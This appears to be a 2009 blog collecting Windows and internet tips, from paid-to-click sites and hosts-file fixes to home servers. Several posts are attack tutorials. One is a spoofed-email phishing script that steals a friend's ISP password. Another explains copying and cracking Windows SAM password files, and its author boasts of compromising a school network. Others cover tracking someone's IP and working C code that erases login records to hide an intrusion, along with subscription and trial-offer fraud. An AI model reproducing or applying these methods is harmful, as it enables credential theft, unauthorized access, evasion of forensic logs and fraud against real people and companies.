Monday, July 13, 2009

Earn Money With bux.to

Earn Money With bux.to

You can earn through bux-to by clicking on ads on bux-to site. First you need to open an account at website:Bux-to. Bux.to is a new innovative, international and FREE English based service that allows advertisers to reach thousands of potential customers by displaying their ad on our, "Surf Ads" page. A exact calculated percentage of all advertising revenue is paid to our members. Bux.to makes money via advertising, other advertising sources throughout the website as well as earning through direct sponsorship of other Bux.to members, just like a regular member does.
How you make money »You view websites in 30 second sessions via the "Surf Ads" page. Once the 30 seconds is up, you'll either get a green tick sign or a red 'X'. The green tick sign means you've earned $0.01 and as premium member $0.0125 for the visit and the 'X' means you have not earned money for the visit. You'll get red X's when you have more than one website from the "Surf Ads" page open. When this happens, you get no credit.A valuable benefit to both the members and the advertisers is the repeat exposure that the advertiser gets. Whenever you click and view a website, you can visit that website again in 24 hours as long as the visit cap hasn't been reached. That's right! After 24 hours you can click and view the website again. This gives the advertiser optimal exposure by using "repeat advertising" and it further increases the members earning potential. Earnings example (based on current averages) » » You click 10 ads per day = $0.10» 20 referrals click 10 ads per day = $2.00 » Your daily earnings = $2.10 » Your weekly earnings = $14.70 » Your monthly earnings = $63.00
How do get paid »If you have at least $10.00 accumulated, you can click on your account balance within your stats area and it will submit your request. Currently, only make payments via AlertPay. They will soon be using other methods of payment.AlertPay is the payment processing solution that we use to pay members. Your AlertPay address is the e-mail address you use to register with AlertPay. You can get a free AlertPay

Problem With Internet Navigation, Clean Host File

Problem With Internet Navigation, Clean Host File


We have seen a large number of computers coming in with problems navigation on the internet. Also unable to go to Windows update and viurs update sites. Here is a quick fix that also seems to speed navigation up some.
Just for safety create a copy of the file before making changes.
goto
C:\windows\system32\drivers\etc\ (Windows XP)
C:\I386 (Windows 2000)
Open the host with notepad.
remove all entries bellow
127.0.0.1 localhost
then save and close

Missing Administrator Account

Missing Administrator Account


Once you have created regular user accounts, the default Administrator account vanishes from the Welcome screen, which you see when the computer starts up. Press Ctrl-Alt-Delete twice at the Welcome screen to retrieve the standard logon dialog. You can log on as Administrator from here. To switch among accounts, just click the Log Off button on the Start menu. You'll then see the Log Off Windows dialog box. Click the Switch User button, and you'll be taken to the Welcome screen where you can select and log on to other accounts.

Mastering The Windows XP Registry

Mastering The Windows XP Registry


The Recovery ConsoleThe Windows XP Recovery Console is a tool that allows recovery from a number of failures. Previously, all you could do was boot another copy of Windows XP and hack your way around, replacing files, even registry components, in the blind hope that you would somehow fix the problem.With Windows XP, you have two tools to use: the Recovery Console and the Safe Mode feature.The Recovery Console is a powerful, simple (no, that's not an oxymoron!) feature that is supplied with Windows XP, but it is not installed by default. The Windows XP Safe Mode works in the same manner as the Safe Mode found in other versions of Windows. You can modify a number of system settings using Safe Mode (such as video modes). Installing the Recovery Console after the system has failed is quite like locking the barn doorafter the horse has been stolen—it really won't work that well.
Installing the Recovery ConsoleThe Recovery Console must be installed before disaster strikes. It will be difficult (maybe even impossible) to install it after a disaster has reared its ugly head. So, let's install the Recovery Console right now.
First, you must use the Windows XP distribution CD (or share containing the appropriate files, if installing from a network device). The Recovery Console is installed using the winnt32.exe program. The winnt32.exe program is the same program that is used to install Windows XP; however, by selecting the correct option, you are able to tell winnt32.exe to not install Windows XP, but to install the Recovery Console instead.
Note It is not possible to install the Recovery Console at the same time as Windows XP. You must first install Windows XP, then install the Recovery Console. If you have multiple copies of Windows XP installed, it is only necessary to install the Recovery Console one time—the Recovery Console will work with as many copies of Windows XP as areinstalled.
Follow these steps to install the Recovery Console from the Windows XP distribution CD:1. Insert the distribution CD and change into the i386 directory.2. Run winnt32.exe using the /cmdcons option. Typically, no other options are needed, though some users may wish to specify source options, especially if installing from a network share rather than a hard drive.3. The installation program contacts Microsoft to check for updates to this Windows XP component.
Figure 2.3: Windows XP's Dynamic Update uses the Internet to retrieve the latest files directly from Microsoft.4. The winnt32.exe program opens the dialog box shown in Figure 2.4. This dialog box allows you to cancel the installation if you need to. Note that multiple installations of the Recovery Console will simply overwrite previous installations; in such cases, no error is generated.
Figure 2.4: Setting up the Recovery Console using winnt32/cmdcons by passes all other setup options.5. If there are no errors, the dialog box shown in Figure 2.5 is displayed. The Recovery Console is ready for use at this point.
Figure 2.5: The Recovery console has been successfully installed.
What's in the Recovery Console?
The Recovery Console consists of a minor modification to the boot.ini file, and the addition of a hidden directory on the boot drive. The added directory's name is cmdcons. The change to the boot.ini file is simply the addition of another line providing for a new boot option:C:\cmdcons\bootsect.dat="Microsoft Windows Recovery console" /cmdconsThis option consists of a fully qualified file name (C:\cmdcons\bootsect.dat), a text description (Microsoft Windows Recovery Console), and a boot option (/cmdcons).As everyone should be well aware, the Windows XP Boot Manager is able to boot virtually any operating system (assuming that the operating system is compatible with the currently installed file system).
How Windows XP Supports Booting other Operating SystemsWindows XP can be told to "boot" any directory or file location. For example, the Recovery Console is saved in the cmdcons directory. In the cmdcons directory is a 512-byte file named bootsect.dat. Windows XP will treat a file named bootsect.dat exactly as if it were a hard disk's boot sector. In fact, one could, theoretically, copy the bootsect.dat file to a drive's boot sector location and cause that operating system to be booted directly.
One use for this technology is in a multiple-boot configuration where the other operating system or systems are not compatible with Windows NT (such as Windows 95/98/Me).The Recovery Console does qualify as an operating system, though it is very simple—and limited.A major question will always be this: is the Recovery Console secure? In most situations, theRecovery Console is actually quite secure. The user, at startup of the Recovery Console, is prompted for two pieces of information:• Which Windows XP installation is to be repaired (assuming that there is more than one Windows XP installation!).• The Administrator's password for that installation. The Recovery Console then uses the installation's SAM to validate this password to ensure the user has the necessary permission to use the system.A situation comes to mind: if the Administrator's password is lost or otherwise compromised, not only may it be impossible to use the Recovery Console, but anyone with access to the compromised password could modify the system with the Recovery Console. This is not really an issue, though. If the Administrator's password is lost, that's life. It will be difficult, if not impossible, to recover the password. If the security of the Administrator's password is compromised, then it will be necessary to repair the damage—changing the password is mandatory in this case. In either case, the Recovery Console is no less secure than Windows XP is.The cmdcons directory holds over 100 files._________________

Make A Autorun File For Ur Cd

Make A Autorun File For Ur Cd


If you wanna make a autorun file for that CD you are ready to burn just read this...
1) You open notepad
2) now you writ: [autorun]OPEN=INSTALL\Setup_filename.EXEICON=INSTALL\Setup_filename.EXE
Now save it but not as a .txt file but as a .inf file.
But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi
3) Now burn your CD with the autorun .inf file included.
4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "This Computer"

Leet Way To Get Your Ip In Windows Xp

Leet Way To Get Your Ip In Windows Xp


okay you want to get your ip in windows xp and want to impress your friends.Go start-> run -> type cmd
then type cd \
will drop you into your root dir
then type cd c:\windows\system32
then type ipconfig
now that pimp your friends will be like wow, leet

How To Make Your Own Radio Station

How To Make Your Own Radio Station


Must HAVE Winamp (Any Version)First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have alot of latency, just dnt bother)Second, your going to have to have a domain, an updated one with the current i.p active. (Could be anything e.g. My sig)
Now, Your gonna have to download the Shoutcast Files.
Go to www.shoutcast.com to get the files.
Ok After downloading these, installing Both of them in any order i dnt care. Go to START>PROGRAM FILES>SHOUTcast DNAS>EDIT SHOUTCAST DNS CONFIG.
Ok your gonna have to Configure it:Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember)The Portbase: change it to whatever port you want itMaxusers: (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.
Open winamp, RIGHT CLICK>OPTIONS>PREFRENCES>DSP EFFECT> and choose the NULLSOFT SHOUTCAST.
Go to OUTPUT, and then click on Connection, Through the ADDRESS, type your address which you have done through www.no-ip.com, PORT NUMBER, whatever u did in the EDIT.txt, and your password.
Then go to Encoder, and choose your quality of your music. Go back to OUTPU>OUTPUT CONFIG> YELLOW PAGES. this is your advertisemant information. dow hatever you like there.
Now Connect. to check that your Radio os on-line go to http://(your address that you added in the prefrence)

How To Speed Up A Slow Computer

How To Speed Up A Slow Computer


First off in the bottom right hand corner of your computer if you see alot of icons start up there when you first start your computer then this is for you if you dont know already how to get rid of em.
Press your Start Button (bottom left) and go to "run"now type in: msconfignow you will get a box that pops up and will tell you bunch of stuff dont mess with anything else other than what I tell you otherwise you could do something really bad (possible) go to your "startup" tab on the top right of the screen where it usually is and click it.
Now you will have a closed in box with bunch of filenames n addresses and more boxes with checks in them. Now if your like me you dont want anything startin up when you start you computer up or while your even doing anything cause it slows you down. Now unless your like me right now 1 have 1 thing starting up when my computer starts up and thats my settin for my overclocked vid card. But other than that uncheck every box and then hit apply and ok. Then window you were jus in will now close and ask you if you want to restart or wait till later to restart.
Either way when you shut it off and then turn it back on the settins will kick in

How to speed Up HTTP Requests On Internet Explorer

How to speed Up HTTP Requests On Internet Explorer


To comply with current Internet standards, Internet Explorer limits the number of simultaneous downloads to two downloads, plus one queued download. This configuration is a function of the browser. However, as connection speeds increase, and the number of total connections that are allowed to Internet servers increase, the two-connection limit may be restrictive.
Please Note: Changing the maximum number of connections beyond two is a violation of Internet standards; use at your own risk!
To increase the number of simultaneous connections that are allowed, follow these steps:
1. Start the Registry Editor2. Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings3. Select New > DWORD Value from the Edit menu4. Name the new value MaxConnectionsPer1_0Server5. Right-click the MaxConnectionsPer1_0Server value and choose Modify6. Under Base, click the radio button next to Decimal7. In the Value Data: box enter the number of simultaneous connections you want to set (for example 10 is a good value), and 8. click OK9. Repeat steps 3 - 7 using the new value MaxConnectionsPerServer10. Exit the registry editor
Visit

http://blogs.msdn.com/nickmac/archive/2004/08/25/220001.aspx

How to set up a http server running from you computer

How to set up a http server running from you computer


(Either you can set up a basic server which means you stop at step... or if you want to make a server with free address you can continue after that step)
1. We are going to use a program called hfs i like the beta version (2) you will need to download this program.Go to www.rejetto.com/temp/hfs2.0beta23.zip
2. Make a folder where you wish to run it from for example C:/Program files/hfs or C:/Documents and settins/Username/My documents/Hfs
3. Move the downloaded zip file into that folder and extract it.
4. Delete the zip file and KEEP THE OTHER FILES!!!!!user posted image5. Run the program and it will come up with a screen that looks like thisuser posted image6. Click the button that says easy mode (this turns it into expert mode which basicly means you have all the options)
7. Where it says port change the port to 80 (this can clash with some programs like webcam on msn and maybe others im not sure) ((the port you choose doesnt really matter 80 is just easier))
8. How to turn on port forwarding. (ONLY for people with routers) ((this varies depending on which make of router you have but for my router sweex i will tell you how its done))Go to internet explorer or mozzilla firefox. Type into the address bar 192.168.2.1 with nothing in else. A window will come up asking you for username and password by default this is admin and 1234 it will only be different if you have changed it.
9. This window should then show up.
user posted image
Click general setup then you will see this window
user posted imageClick NAT then port forwardingYou should now see this
user posted image
In private ip you need to post your computers local network address like for example 192.168.1.1 or 192.168.1.2 it depends. If you do not know how to do this here is how its found outClick start>run>cmd type in the command line ipconfigwaitsome information will come up looking like thisuser posted image
That is your computers local network address.
So going back to
user posted imageNow go back to hfs and you must enter your ip (not your local address but your ip) here
user posted imageKeep the http:// in front of your ip.This is essentially now your server. Make sure it is on and you can go and visit it at http://yourip:port/To add files simply drag and drop them in. Then click virtual folder.
That was if you do not want a personal address you can make it personal like mine http://randomshitfromtimmy.no-ip.org very easily.All you have to do is go to www.no-ip.comMake a usernameLog inClick add on the left hand sideMake a hostname (mine is randomshitfromtimmy)Click port 80 redirectEnter your ip in the ip address fieldAnd choose the port you wish to forward (this is either 80 or the other one that you chose)Click add redirect.
Now you have a fully working hfs system.It runs of you bandwidth so if lots of people are downloading you will find your net goes slowly so remeber to set limits.
(below is a pic of a set up hfs working) Ips blurred for privacy.

How to Get someones ISP password.

How to Get someones ISP password.



1.) Run your telnet program:on windows , go to START -> RUN -> "TELNET".on linux , you should open a shell , and write telnet.2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!3.) now , write the following :
mail from:[**YOUR FRIEND'S ISP WEBMASTER**]rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]dataHi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!- - - - - - - - - - - - - -To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".
note: No moeny will be returned if you don't follow our instructions!
thank you,the support team!
4.) press enter twice and then write "."(without the "") and press ENTER!
--now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .
[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?
[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".
[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".
[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..
* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".
* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)
* and when they ask for your email , type your Real one!!!now continue in your normal life , and remember to read your email!if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!

HOW TO GET ANY WINDOWS PASSWORD

HOW TO GET ANY WINDOWS PASSWORD


ok..... here are the full details.....
this works whether its windows 2000 or windows xp or windows xp SP1 or SP2 or windows server 2003....
this works even if syskey encryption is employed...
if it is FAT filesystem...
just copy the sam file like stated in the first post to an empty floppy disk and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...
if it is NTFS....
u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.
use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....
AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 howver, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.
I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any english dictionary. I haven't used LC5 yet.
If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windowz pass.
Programs needed: SAMInside (doesn't matter which version or if demo)LC4 or LC5 (lophtcrack)( must be full version)NTFSPro (doesn't matter if demo)any bootdisk maker
Cracked or full version software can be found on any warez site. If u don"t know what that is or where to get the programs, post a message and I'll tell u or give them to u.
P.S: I might not keep track of this forum, because I'm going to create a new topic and post tutorial there. if u want to post, plz post there.

How to find a remote IP

How to find a remote IP


Method 1
To view someone's IP# when they send you hotmail email do this:1) Click "Options" on the upper right side of the page.2) On the left side of the page, Click "Mail"3) Click "Mail Display Settings"4) Under "Message Headers" select "Full" or "Advanced"5) Click ok
Method 2reg a dydns account and install the ip pointer, so each time you ping the host name you regestored
for example:you regestor the host name myhost.dydns.com, then you keep a little software running on the target host. The little software will keep update your IP to dydns.com server.
so at your pc just start cmd, and ping myhost.dydns.com, it will give you the most updated ip address.
Method 3neverender, what doesn't work for you? Simply type in nc -vvv -l -p 80 on your box, which will set it to listen in verbose mode on port 80. Then give them a link to your IP address (for example: 111.111.111.11) and tell them to type it in their browser. The browser should resolve the address as well as append port 80 automatically. Just make sure that your friend is not very computer literate.
Method 4Just download a very simple server such as this one and install it on your comp. Then run it and give your ip to the person you want and tell them to connect to it through a browser. Your server will log their connection and you will get their IP.
link:http://www.download.com/Abyss-Web-Server/3000-2165-10283992.html?tag=lst-0-6
Other Ways-www.imchaos.com and make a "spy poll" to put in ur profile, this will tell u the IP of anybody who answers ur poll-originalicons.com there is a page for doin it (i dont like it, but it works)-or irc
Here is a more detailed tutorial about using NetCat.
http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html
Windows users can download NetCat from here:
http://www.atstake.com/research/tools/network_utilities/

How To Block Websties Without Software, block websites

How To Block Websties Without Software, block websites


Steps:
1] Browse C:\WINDOWS\system32\drivers\etc2] Find the file named "HOSTS"3] Open it in notepad4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.5] Done!
-So-
127.0.0.1 localhost127.0.0.2 www.blockedsite.com
-->www.blockedsite.com is now unaccessable<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.
IE: 127.0.0.3 www.blablabla.com127.0.0.4 www.blablabla.com127.0.0.5 www.blablabla.com
etc

Have satallite tv for free!!!

Have satallite tv for free!!!


this is a tut by me that i use at home to get all the channels "not including ppv" for almost free if not free... i have every single channel that dish network offers and i dont pay a single dollar..... ok this is how it goes...-----------------------------------
Get a dish 500 no matter how… “buy /steal”Sign up with dish network for like “top 100” that will give you like 100 channels… it would cost you like 29.99 or 39.99 not sure…Then you need to find 3 friends… or parent friends that are interested in having satellite TV….Dish network allows you to have up to 4 receivers in one house with no prob.So the next day, or when ever you find a person or 3 of them… call the dish company and tell them that you would like to activate your 2nd receiver and would like to add some additional channels… for that you would need “receiver # and smart card # of that new receiver that is at your friends house” so you give them the info and they hook the second receiver up… just don’t tell them that the receiver is not in the house…They will hook up to 3 more receivers per account and when you get all 4 receivers you can get all channels on them and just split your bill between the other 3 people that are using your subscription…For me it works perfectly… I live in Oregon and I have a receiver in my friends’ house in Washington and two in California USA.I don’t know if this thing would work anywhere else but it sure works for me

Guide For Getting Free Stuff

Guide For Getting Free Stuff


Ok, if you are like me you have heard so much about the FreeIpods and FreeFlatScreens websites on different forums, blogs, IM's, etc, you are about to puke. So am I. But yet the draw of getting an Ipod for doing basically nothing is pretty strong. I dismissed all the "stories" of people getting their ipods as the marketing machine at work. However, when Kevin Rose published that not only did he receive his, but a few of his friends did as well, I figured I might take a chance and give it a go. Today I received proof that it does indeed work. Yep, I got my iPod.
Whats in it for them?Step 1. Collect Names.Step 2. Send those names items worth $200 or moreStep 3. ?????Step 4. Profit
Before I signed up, I wanted to get to the bottom of the ?????. I didn't want any sweaty, filth pushing webmonkeys to have all my info, so I did my research. Gratis Internet, the parent company of the FreeIpods, FreeFlatscreens, etc. sites, recently did an interview with Wired Magazine.In this article Gratis states that they are acting as Head Hunters for companies (more on that later) and are paid between $50-$90 per referral. Although this seems like a lot of money, this is nothing compared to what these companies spend for print advertising which does not guarentee ANY customers. So now we know what ?????? equals. ??????=$50-$90 for Gratis per guranteed customer (referral sites).
How Does it Work?You sign-up on one (or more) of the following websites:
http://www.FreeMiniMacs.com/?r=14098976This site gives away free Mini Macs. At the time of this writing only the 80gb MiniMac was available.
http://www.FreeDesktopPC.com/?r=13082204This site gives away free flat screen monitors and TVs. At the time of this writing the following flat screens were available: Sony 19" LCD, Samsung 15" SyncMaster 510MP LCD TV, Samsung SyncMaster 710N LCD Monitor, Sony 27" FD Trinitron WEGA TV, or a 24" Toshiba TV/VCR/DVD combo
http://www.FreeGamingSystems.com/?r=12660654This site gives away gaming systems. At the time of this writing the Slim PS2, Xbox, Nintendo Gamecube, and Nintendo DS were available.
http://www.FreeHandbags.com/?r=13950244This site gives away high-end handbags. Might be a good surprise for your wife or girlfriend. =) At the time of this writing the following bags were available: Prada Mini-Hobo (black, Pink, Powder Blue), Burberry Novacheck Minisling, Coach Signature Demi Pouch (black, camel, purple), Kate Spade Pia Pochette (Black, Pink, Red)
http://www.mp3players4free.com/default.aspx?r=82419This site gives out free mp3 players. You can get paypal $275, ipod, rio carbon, iriver, ipod mini.
http://www.dvrs4free.com/default.aspx?r=90581This site gives away TiVo, Replay TV, and $275 paypal.
http://www.macminis4free.com/default.aspx?r=181183Another mini mac site.
http://www.cameras4free.com/default.aspx?r=90773This site is giving away high end digital cameras. At the the time of writing this, you follow cams are available: Canon Powershot S1 IS, Sony DSC-P100, Sony DSC-W1, Canon Powershot A95, $325 paypal.
Ok, so here is the tricky part. Once you sign up with one of these websites, you have to complete an "offer" from gratis's advertisers. There are numberous offers, some being better than others. Now remember the ???? = $50 - $90 equation? In order for you to receive your ipod/Flatscreen/Desktop PC/Handbag you have to refer 5, 8, or 10 of your friends, and they have to complete one of the offers as well. Then in order for them to receive theirs they need to refer others, and so on. So lets just look at why they are going to send an Ipod to you. (1(you) + 5(your friends)) x $90 = $540 - $250(ipod) = $290 profit for them just for you signing up. The advertisers are more than willing to pay, and FreeIpods is more than happy to send you your ipod. Works out for everyone.
What is the basic "lingo"?"ref"/"referral" = The thing required to get your free items. These are your friends."green" = Status indicator that means your offer has been completed."yellow" = Status indicator that means your offer has yet to be completed or is in the process/pending."hold" = Means your account has been suspended or stopped. DON'T CHEAT."STV" = Means your product has been "Shipped To Vendor" You should recieve it in about 10 days time.
What process should you use to sign up (to ensure that you will get your item)When signing up, it is recommended that you use Internet Explorer (sucks) some people have reported problems using other browsers (ex. Firefox, opera, etc.) Also make sure you have cookies accepted.
1. Click on one of the links above and enter a VALID US mailing address.
2. Complete the marketing survey - not your answers do not have any impact on you receiving your item. Just say no to them.
3. Once you have signed up, you should receive a verification email. If you did not receive one, go to the "My Account" page and click the link to have them resend it. If you still did not get it check your spam folder.
4. Sign-up with one of their partners and complete the offer. (see the section which offer should I choose) It can take up to 15 days for your offer to show completed. (A term that we freebie goers use for a "completed offer" is called "credit.") But usually they show completed after 24 hours. Be patient. If it doesn't show up as completed, you can email the site with proof and confirmation for signing up and they will give you credit.
Which offer should I choose?Just so you know all offers require a credit card, **HOWEVER** not all of them cost anything! =) Here is a list of my recommended offers and I have not had any problems whatsover with doing these.
* Video Professor: This requires a credit card and pay only $3 shipping for computer tutorial CDs. After you receive the CDs, just call customer support and cancel your membership. Return to sender the CDs and they will refund you the shipping costs.
* Complete Home: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Lowes Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!
* Buyer's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Circuit City Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!
* Great Fun: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Walkie Talkie just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!
* Traveler's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Thin Digital Camera just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!
* eFax Plus: Sign up for their fax service. You get a 30 day free trial. Upon receiving credit for doing the offer, simply cancel the service within the free trial and pay nothing! It usually take 1-3 days to receive credit for this offer.
* Blockbuster Online: Try a two week trial of Blockbuster's Netflix-like service. Cancel online within trial time and pay nothing.
*Zooba: If you are a book fan, sign up for this offer. You get a book for $10 with free shipping. Instant verification.
*Various Credit Card offers: Apply for a credit card and get approved. When it arrives, cut it up and toss it out. Nothing to cancel, nothing to pay, and free stuff to gain!
Many of these offers are big companies, so you do not have to question the legitimacy for signing up under them. In other words, you will be safe because you are giving your credit card information to aol, blockbuster, and general motors, and i highly doubt that they will sell this info.
These are free, as long as you cancel within the trial period. Some offer online cancellations while others require calling their support number. Just tell them that you dont find yourself using their services enough so you want to cancel and they'll cancel your membership without any problems.
CheatingMany of these free sites take cheating very seriously. If you want your free gift and not have you account suspended, simply DON'T CHEAT! Don't refer yourself and do all the offers yourself. If you think you can cheat the system because you are a 1337 h4x0r and you can use proxies and IP spoofs to refer yourself, DON'T DO IT. When you are in the approval stage, they will intensely throughly examine your account and make sure that all your referrels are legit and unique. Trust me, I know many people who have gotten suspended for attempting to cheat.
Multiple AccountsThis goes under cheating. It is wise not to create multiple accounts under the same site because it is against the free site's TOS. They suspend you no matter what your reason is, even if it was an accident. This also includes referring family members. You can only create one account under one household, under one IP address per site. So you cannot refer mother, sister, or brother to do it unless they live in another household.
So you've ran out of offers to do. What do I do?Ok, if you are a freebie freak, you will probably eventually run out of offers to do because of the fact that you signed up for so many free sites did all the easy free offers. What shoud you do? Remember that free sites give you credit for a unique signup for the offers. So if you signed up for blockbuster online offer at freeflatscreens, you cannot do it again for another free site such as freedesktoppc. But there is a trick to this. A unique signup = a unique credit card that you used to sign up. So if you have a another credit card, you can sign up for the offer again. Another method is to purchase a visa gift card from your mall, or go to www.webcertificate.com and purchase a virtual debit/credit card and do the offers with those.
If you followed all these steps correctly, your free gift will be delivered to your doorstep in no time.
Here are the steps:1. Getting friends to sign up under you2. Approval Stage: They will analyze your account for fraud. Takes 1 week.3. Pending Stage: Your account have been approved. You are now processing. This will take 1-2 weeks.4. STV: Sent to Vendor. Your product will arrive in 10 days.5. Shipped: Congrats!
Most of these freebie sites are for U.S residents only.

Erasing Your Presence From System Logs

¤¤ Erasing Your Presence From System Logs ¤¤



Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.

Example:

#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}



Delete An "undeletable" File

Delete An "undeletable" File


Open a Command Prompt window and leave it open.Close all open programs.Click Start, Run and enter TASKMGR.EXEGo to the Processes tab and End Process on Explorer.exe.Leave Task Manager open.Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.At the command prompt type DEL where is the file you wish to delete.Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.Close Task Manager.
Or you can try this
Open Notepad.exe
Click File>Save As..>
locate the folder where ur undeletable file is
Choose 'All files' from the file type box
click once on the file u wanna delete so its name appears in the 'filename' box
put a " at the start and end of the filename(the filename should have the extension of the undeletable file so it will overwrite it)
click save,
It should ask u to overwrite the existing file, choose yes and u can delete it as normal
Here's a manual way of doing it. I'll take this off once you put into your first post zain.
1. Start2. Run3. Type: command4. To move into a directory type: cd c:\*** (The stars stand for your folder)5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~16. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.
Create One-Click Shutdown and Reboot Shortcuts:


First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.
